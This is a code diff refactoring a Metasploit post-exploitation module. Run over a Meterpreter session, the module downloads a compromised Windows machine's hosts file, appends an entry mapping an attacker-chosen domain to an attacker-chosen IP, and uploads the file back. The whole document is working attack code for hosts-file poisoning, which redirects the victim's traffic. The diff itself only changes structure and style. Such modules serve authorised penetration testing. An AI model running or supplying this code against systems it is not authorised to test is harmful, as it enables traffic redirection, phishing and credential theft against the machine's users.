@@ -3,6 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'English'
 class MetasploitModule < Msf::Post
 
   def initialize(info = {})
@@ -30,49 +31,49 @@ class MetasploitModule < Msf::Post
               stdapi_fs_stat
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
         }
       )
     )
 
-    register_options(
-      [
-        OptString.new('DOMAIN', [ true, 'Domain name for host file manipulation.' ]),
-        OptString.new('IP', [ true, 'IP address to point domain name to.' ])
-      ]
-    )
+    register_options([
+      OptString.new('DOMAIN', [ true, 'Domain name for host file manipulation.' ]),
+      OptString.new('IP', [ true, 'IP address to point domain name to.' ])
+    ])
   end
 
   def run
-    if datastore['IP'].nil? or datastore['DOMAIN'].nil?
-      print_error("Please specify both DOMAIN and IP")
-      return
-    end
-
     ip = datastore['IP']
     hostname = datastore['DOMAIN']
 
-    # Get a temporary file path
+    if ip.blank? || hostname.blank?
+      fail_with(Failure::BadConfig, 'Please specify both DOMAIN and IP.')
+    end
+
+    hosts_file_path = session.sys.config.getenv('SYSTEMROOT') + '\\System32\\drivers\\etc\\hosts'
+
     meterp_temp = Tempfile.new('meterp')
     meterp_temp.binmode
     temp_path = meterp_temp.path
 
     begin
       # Download the remote file to the temporary file
-      client.fs.file.download_file(temp_path, 'C:\\WINDOWS\\System32\\drivers\\etc\\hosts')
-    rescue Rex::Post::Meterpreter::RequestError => re
-      # If the file doesn't exist, then it's okay.  Otherwise, throw the
-      # error.
-      if re.result != 2
-        raise $!
-      end
+      client.fs.file.download_file(temp_path, hosts_file_path)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      # If the file doesn't exist, then it's okay.  Otherwise, throw the error
+      raise $ERROR_INFO unless e.result == 2
     end
 
     print_status("Inserting hosts file entry pointing #{hostname} to #{ip}..")
     hostsfile = ::File.open(temp_path, 'ab')
     hostsfile.write("\r\n#{ip}\t#{hostname}")
-    hostsfile.close()
+    hostsfile.close
 
-    client.fs.file.upload_file('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', temp_path)
-    print_good("Done!")
+    client.fs.file.upload_file(hosts_file_path, temp_path)
+    print_good('Done!')
   end
 end
